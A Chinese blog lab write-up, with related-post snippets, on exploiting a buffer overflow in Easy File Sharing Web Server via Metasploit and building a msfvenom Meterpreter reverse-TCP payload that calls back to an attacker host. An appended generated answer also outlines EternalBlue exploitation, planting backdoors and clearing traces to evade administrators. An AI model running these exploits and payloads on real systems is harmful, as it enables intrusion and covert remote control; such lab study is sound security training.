easy file sharing web server 复现 + msf被控端与主控端使用

已于 2023-12-20 11:17:02 修改
阅读量597 收藏 9
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 渗透测试学习 文章标签: 测试工具 web安全 安全
于 2023-12-20 11:15:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WRplayeR/article/details/135103473
文章讲述了如何在Windows系统中利用EasyFileSharing服务漏洞,通过Metasploit执行Meterpreter攻击并获取管理员权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

easy file sharing web server 复现

攻击机:192.168.232.133

靶机:192.168.232.136

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

这里使用Msf利用该漏洞,选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块

设置好目标即可执行,成功

执行shell和whoami之后可以查看当前权限为管理员

使用calc命令即可弹计算器

Metasploit被控端与主控端的使用

攻击机:192.168.232.133

靶机:192.168.232.136

  1. 生成被控端

使用命令msfvenom -p windows/meterpreter/reverse_tcp

lhost=192.168.232.133 lport=5000 -f exe -o Desktop/payload.exe

  1. 生成主控端

依次执行命令

被控端放入靶机并双击执行

链接成功

尝试弹计算机

成功

退出命令行后使用download下载efssetup_20181文件,成功

Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2352
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
如何使用msfvenom生成被控并进行远程控制
Hotumn的博客
06-26 676
Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具,它其实是MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控。在KaliLinux2中提供了多个可以用来生成远程控制被控的命令,其中较为简单且强大的命令为msfvenom命令,MSFPC命令其实也是经过包装的msfvenom命令。msfvenom命令是渗透测试工具Metasploit中的一个命令,但是我们可以直接在。
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
easy file sharing server
qq_74398661的博客
12-28 609
做一下这个漏洞复现1.在kali 和Windows这两台虚拟机上做并且是以NAT模式连接在同一网络2.先在Windows7虚拟机中安装easy file sharing server安装之后会出现以下界面,选择try it可知http服务用的口为80,服务器ip=192.168.110.130接下来使用kali用nmap工具扫描上面的IP 192.168.110.130查看各开放使用的服务名称和版本号80口和443口80口开放利用漏洞在kali中访问存在漏洞的服务口。
远程控制Easy File Sharing Web Server
qq_38467991的博客
12-27 598
p接的是攻击的载荷类型,即针对Windows操作系统的Meterpreter反向TCP payload,Meterpreter是Metasploit框架中的一种强大的交互式Shell,可以在远程系统上执行各种命令和操作。攻击者进行对目标口的攻击,这里特地标明使用python2,因为电脑可能安装有python2和python3两个版本的python因此虚拟机这边率先使用python3会导致语法上的不兼容从而导致无法执行这个python2写的版本(一句话:此处没有向下兼容)-o接的是输出文件的路径和名称。
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1469
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
Easy file sharing server靶机测试
weixin_54584489的博客
11-14 3725
安装靶机easy file sharing web server 并将port改为8000,按下restart建; 从该靶机界面可知其ip地址为192.168.202.1; 打开kali用nmap扫描一下该ip地址; 从扫描结果可知运行在靶机Easy file sharing web server 上的8000口确实打开了; 接着利用searchsploit查看靶机存在的漏洞; 右边是测试脚本,左边是漏洞类型,随机选一个漏洞和对应的脚本进行测试 回车 我们会发现...
使用msfvenom生成被控并进行远程控制
Z_3679的博客
07-01 579
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
远程控制被控杀毒软件的博弈
a1013770350的博客
05-03 1933
1、启动PowerSploit的方法:开始/搜索程序和文件(输入:PowerShell,选择Windows PowerShell)注意:程序被注入后,可能会出现工作异常的情况,所以不要注入到系统进程里,否则会引起程序崩溃。记事本是否已经崩溃?注:每深入一次分解,分解小文件的大小要逐级降低,如改为:-interval 1000、-interval 100。7、这次生成的是64位的攻击载荷,对64位的进程有效,那么对32位的进程有否有效?(3)对报毒的文件重复上述分解、查毒过程,直到找到特征码所在的位置。
MSF漏洞复现
mackilo的博客
11-08 8643
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
Easy File Sharing Web Server 漏洞复现
2401_83943410的博客
10-28 319
发现800口version:Easy File Sharing Web Server httped 6.9该版本存在的缓冲区溢出漏洞。调用windows/remote/39009.py脚本 加上靶机ip地址 和口号。可见口为800口,靶机IP地址为192.168.45.138。lhost:kali的ip地址 lport:为5000口。-p或–payload参数用来指定要使用的Payload。2.使用kali工具nmap扫描靶机ip。随便输入用户名,网站是可以正常访问的。
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 560
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 573
实验过程 首先在电脑上打开easy file sharing web server 并设置好口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000口,并将指定代码发送过去 执行完成后,easy file sharing we
easy file sharing server 漏洞复现
cheng___yu_的博客
12-14 3351
一、漏洞详情 Easy File Sharing FTP Server 是一款 FTP 服务程序。 Easy File Sharing FTP Server 处理 PASS 命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为 PASS 命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令 二、工具 靶机: 192.168.118.132、win10(把 windows 安全中心关闭)、安装 easy file sharing s
Easy File Sharing Server漏洞利用
D000o11的博客
12-03 3116
首先我们用windows系统虚拟机作为靶机并运行easy file sharing server 然后,我们用nmap -sV IP靶机地址扫描口,可以看到79口运行了easy file sharing server httpd 6.9: 使用searchsploit Easy File Sharing Web Server寻找可以利用的漏洞脚本。 我们在此使用39009.py文件,用这个漏洞打开靶机上的计算器软件: 可以看到靶机上的计算机已经打开,而且easy f...
Easy File Sharing Web Server漏洞复现
m0_73952621的博客
01-03 491
4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 8080。1、在靶机(Win2003)中安装easy file sharing server口改为8080,URL为靶机ip。1、利用Nmap扫描发现靶机(Windows)运行了该服务。2、在kali中用nmap -sV扫描靶机IP。2、利用该漏洞,使得靶机运行计算器。打开靶机即可看到计算器被调用了。1、win2003靶机。
网络渗透测试复现任务easy file sharing server
m0_74897691的博客
01-02 474
2.将efssetup_2018.zip直接拖进Windows server 2016解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!5.使用nmap -sV 192.168.239.134进行扫描(这里可能是由于Windows sever 2016安装时的配置问题或是口设置问题,没有扫成功)(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。(一)生成主控被控
Easy File Sharing Web Server漏洞复现任务和Metasploit应用
hjhwdwdw的博客
12-26 665
实验环境:win7靶机,kali。
复现 MSF控制一台虚拟机的过程
最新发布
12-13
复现MSF(Metasploit Framework)控制一台虚拟机的过程可以分为以下几个步骤: ### 1. 环境准备 - **安装虚拟机**:首先,你需要在你的计算机上安装一个虚拟机软件,如VMware或VirtualBox,并在其中安装一个目标操作系统(如Windows或Linux)。 - **安装Metasploit Framework**:在你的主机操作系统上安装Metasploit Framework。可以使用Kali Linux,它预装了Metasploit。 ### 2. 配置虚拟机 - **配置网络**:将虚拟机的网络适配器设置为桥接模式或NAT模式,以便它主机在同一网络中。 - **安装必要的软件**:在虚拟机中安装一些常见的软件,如浏览器、办公软件等,以便后续进行漏洞利用。 ### 3. 查找漏洞 - **使用Nmap扫描**:在主机上使用Nmap工具扫描虚拟机的开放口和服务。 ```sh nmap -sV <虚拟机IP> ``` - **查找已知漏洞**:根据扫描结果,查找目标操作系统和软件版本是否存在已知漏洞。 ### 4. 编写攻击载荷 - **选择合适的漏洞利用模块**:在Metasploit中搜索目标漏洞匹配的模块。 ```sh msfconsole search <漏洞名称> ``` - **配置攻击载荷**:选择合适的攻击载荷(如reverse_tcp)并配置相关参数。 ```sh use <漏洞利用模块> set RHOST <虚拟机IP> set LHOST <主机IP> set LPORT <主机口> ``` ### 5. 执行攻击 - **运行攻击**:执行攻击载荷,等待虚拟机连接回主机。 ```sh exploit ``` - **获取会话**:如果攻击成功,你将获得一个会话,可以远程控制虚拟机。 ### 6. 维持访问 - **设置后门**:为了维持对虚拟机的访问,可以设置后门或使用持久性攻击载荷。 - **清理痕迹**:清理攻击过程中留下的痕迹,避免被目标系统管理员发现。 ### 示例 假设我们使用Metasploit攻击一个存在EternalBlue漏洞的Windows虚拟机: ```sh msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST <虚拟机IP> set LHOST <主机IP> set LPORT 4444 exploit ``` 如果攻击成功,你将获得一个meterpreter会话,可以执行各种命令来控制虚拟机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值